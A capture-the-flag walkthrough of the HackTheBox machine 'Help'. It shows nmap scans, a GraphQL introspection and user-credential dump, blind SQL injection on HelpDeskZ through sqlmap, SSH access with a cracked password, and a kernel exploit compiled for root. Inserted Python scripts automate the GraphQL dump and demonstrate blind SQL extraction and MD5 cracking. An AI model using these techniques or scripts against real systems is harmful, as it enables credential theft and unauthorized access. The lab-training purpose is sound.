Help
#Linux #SQLi #API
Help is an easy-rated Linux machine from HackTheBox created by cymtrick. In this post my IP is 10.10.14.23 and the target's IP is 10.129.227.176.
The machine feels pretty arbitrary: the HelpDeskZ version can only be learned from a readme whose existence you know about from the project's GitHub, and the URL vulnerable to SQLi is really hidden. I didn't like this machine at all.
Recon
nmap -p- --open -sS --min-rate 5000 10.129.227.176 -vvv -n
Nmap scan report for 10.129.227.176
Host is up, received reset ttl 128 (0.0027s latency).
Scanned at 2023-07-09 02:51:15 UTC for 40s
Not shown: 63200 filtered tcp ports (no-response), 2333 closed tcp ports (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 128
80/tcp   open  http    syn-ack ttl 128
3000/tcp open  ppp     syn-ack ttl 128
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 39.72 seconds
Raw packets sent: 196635 (8.652MB) | Rcvd: 40142 (1.606MB)

nmap -sCV -p 22,80,3000 10.129.227.176 -oN Target
Nmap scan report for 10.129.227.176
Host is up (0.021s latency).
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Browser: http://help.htb
At this point we have nothing: it is just a web site serving the default Apache index, so the best option is to fuzz the target for directories.
Fuzzing turns up only "support" and "javascript", and at first glance there is virtually nothing in them, so let's explore the other port.
We don't have any credentials or tools to use here...
Port 3000

All right, this looks like a taunt; let's extract more information.
Nothing useful from curl, so let's fuzz it with an API-specific wordlist.
So there is a GraphQL endpoint on the API; now we need GraphQL-specific techniques.
GraphQL is usually queried with POST, so intercept the request in Burp Suite, change the method to POST, add the header "Content-Type: application/json", and send the first suggested payload, a schema introspection query.

It works, and the same request can be sent with curl.

We know there is a "User" type, so now we want to dump it.
We find an email and a password hash. These should work on the other website, but first we need to crack the hash.
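The introspection-then-dump steps above, automated, as an added example that is not code from the original write-up: it parses an introspection response, finds every root query field that returns an object type, and builds a query selecting all of that object's scalar fields, so the "User" dump does not have to be typed by hand. The /graphql path on port 3000, the sample schema (a `user` root field returning `User` objects with `id`, `username` and `password`) and the embedded introspection response are assumptions constructed for the demonstration; the write-up only tells us that a "User" type exists.

```python
import json
import sys
import urllib.request

# Assumed endpoint: the Node.js/Express API on port 3000 from the scan.
# The /graphql path is an assumption; the write-up does not name it.
GRAPHQL_URL = "http://10.129.227.176:3000/graphql"

# Introspection query: the root query type plus every type's fields, nested
# deep enough to see through NON_NULL and LIST wrappers.
INTROSPECTION_QUERY = """
{ __schema {
    queryType { name }
    types { name kind
      fields { name
        type { name kind ofType { name kind ofType { name kind } } } } } } }
"""


def graphql_request(url, query):
    """The request Burp was used to craft in the text: POST, JSON body,
    Content-Type: application/json."""
    body = json.dumps({"query": query}).encode()
    return urllib.request.Request(
        url, data=body, method="POST",
        headers={"Content-Type": "application/json"})


def run_query(url, query):
    """Send a query to the live endpoint and return the parsed JSON (needs network)."""
    with urllib.request.urlopen(graphql_request(url, query), timeout=10) as resp:
        return json.load(resp)


def unwrap(type_ref):
    """Follow ofType through NON_NULL/LIST wrappers to the named type."""
    while type_ref.get("kind") in ("NON_NULL", "LIST") and type_ref.get("ofType"):
        type_ref = type_ref["ofType"]
    return type_ref


def dump_queries(introspection):
    """For every root query field that returns an object type, build a query
    selecting all of that object's scalar and enum fields.
    Returns {root_field_name: query_string}."""
    schema = introspection["data"]["__schema"]
    types = {t["name"]: t for t in schema["types"]}
    root = types[schema["queryType"]["name"]]
    queries = {}
    for field in root.get("fields") or []:
        obj = types.get(unwrap(field["type"]).get("name"))
        if not obj or obj["kind"] != "OBJECT":
            continue
        scalars = [f["name"] for f in obj.get("fields") or []
                   if unwrap(f["type"]).get("kind") in ("SCALAR", "ENUM")]
        if scalars:
            queries[field["name"]] = "{ %s { %s } }" % (field["name"], " ".join(scalars))
    return queries


# Constructed introspection response standing in for the server's answer
# (type and field names are assumptions): a root Query whose `user` field
# returns a list of User objects.
SAMPLE_INTROSPECTION = {"data": {"__schema": {
    "queryType": {"name": "Query"},
    "types": [
        {"name": "Query", "kind": "OBJECT", "fields": [
            {"name": "user", "type": {"name": None, "kind": "LIST",
                "ofType": {"name": "User", "kind": "OBJECT", "ofType": None}}}]},
        {"name": "User", "kind": "OBJECT", "fields": [
            {"name": "id", "type": {"name": None, "kind": "NON_NULL",
                "ofType": {"name": "ID", "kind": "SCALAR", "ofType": None}}},
            {"name": "username", "type": {"name": "String", "kind": "SCALAR", "ofType": None}},
            {"name": "password", "type": {"name": "String", "kind": "SCALAR", "ofType": None}}]},
        {"name": "String", "kind": "SCALAR", "fields": None},
        {"name": "ID", "kind": "SCALAR", "fields": None},
    ]}}}


if __name__ == "__main__":
    url = sys.argv[1] if len(sys.argv) > 1 else GRAPHQL_URL
    schema = run_query(url, INTROSPECTION_QUERY)
    for name, query in dump_queries(schema).items():
        print("#", name)
        print(query)
        print(json.dumps(run_query(url, query), indent=2))
```

Run it with the endpoint URL as the only argument; against the constructed sample schema it produces `{ user { id username password } }`, which is the dump query the text sends manually. If introspection is disabled on a real target, the same `graphql_request` helper still works for hand-written queries.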


Exploitation
Reverse Shell (Help)
After exploring the website and testing the ticket system I found nothing... so let's just search for "HelpDeskZ GitHub".

Edit the Python script: add # -*- coding: utf-8 -*- as its first line,
and at line 94 change the line to session = requests.session().
Now submit another ticket with a file attached, then run the exploit again and wait.
In the end it does not work, but at least now we know the URL where the injection happens.
Intercept the download of an attachment and save the request to a file (saved here as request).

Now run sqlmap against the saved request to extract the password hash.
sqlmap returns the hash; once cracked, the password is Welcome1. Use it to log in through SSH.
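What sqlmap does behind the saved request, as an added example that is not part of the original post and is not HelpDeskZ code: an in-memory SQLite stand-in for the attachment-download lookup, with the string-concatenated (vulnerable) query beside its parameterised form, a boolean-based blind extractor that recovers the stored hash one character at a time from nothing but "file served / error page", and the wordlist lookup that the text calls "decrypting". The table and column names, the stand-in schema and the mini wordlist are assumptions constructed for the demo; the only value taken from the write-up is the cracked password Welcome1.

```python
import hashlib
import sqlite3

# Constructed SQLite stand-in for the application's database; table and
# column names are assumptions, not HelpDeskZ's real schema.
DB = sqlite3.connect(":memory:", check_same_thread=False)
DB.executescript("""
CREATE TABLE attachments (id INTEGER PRIMARY KEY, ticket_id INTEGER, filename TEXT);
INSERT INTO attachments VALUES (1, 7, 'invoice.pdf');
CREATE TABLE staff (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
""")
# The text says the recovered hash cracks to Welcome1, so the stand-in row
# stores its unsalted MD5.
STAFF_HASH = hashlib.md5(b"Welcome1").hexdigest()
DB.execute("INSERT INTO staff VALUES (1, 'admin', ?)", (STAFF_HASH,))


def download_exists(attachment_id):
    """Vulnerable lookup: the id taken from the download URL is concatenated
    straight into the SQL. Returns True when a row comes back (the app would
    serve the file) and False otherwise (error page), which is all a blind
    injection needs."""
    sql = "SELECT filename FROM attachments WHERE id=" + attachment_id
    try:
        return DB.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def safe_download_exists(attachment_id):
    """Hardened form: the id is validated and bound as a parameter, so the
    same payload is just an invalid number."""
    try:
        ident = int(attachment_id)
    except ValueError:
        return False
    row = DB.execute("SELECT filename FROM attachments WHERE id=?", (ident,)).fetchone()
    return row is not None


def oracle(condition):
    """Ask the vulnerable page one yes/no question about the database."""
    return download_exists("1 AND (%s)" % condition)


def extract(subquery, max_len=64):
    """Recover the string a SQL subquery returns, one character at a time,
    binary-searching each code point (0..127) through the boolean oracle.
    This is the boolean-based blind technique sqlmap automates."""
    out = ""
    for pos in range(1, max_len + 1):
        char = "unicode(substr((%s),%d,1))" % (subquery, pos)
        if not oracle(char + " > 0"):
            break  # substr past the end yields '', unicode('') is NULL: done
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle("%s > %d" % (char, mid)):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def crack_md5(digest, wordlist):
    """The 'decrypt' step in the text is really a lookup: hash each candidate
    and compare. Returns the matching word or None."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


if __name__ == "__main__":
    recovered = extract("SELECT password FROM staff WHERE username='admin'")
    print("hash:", recovered)
    # Constructed mini wordlist for the demo.
    print("password:", crack_md5(recovered, ["password", "admin", "Welcome1"]))
```

Each character costs one existence probe plus seven comparisons, so a 32-character MD5 hash takes about 256 requests; sqlmap's `--technique=B` does the same dance over HTTP, and its `--time-sec` variant only swaps the oracle for a sleep() delay when the page gives no visible true/false difference. The parameterised version shows why the fix is trivial once the lookup is found.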
Privilege Escalation
We have the first flag; now we run some basic checks for escalation.
uname -a shows an unusually old kernel; searching Exploit-DB for "Linux Kernel 4.4.0-116" turns up a matching exploit.
Copy the exploit source to /tmp as exploit.c (paste it with nano), then compile it with gcc -o attack exploit.c.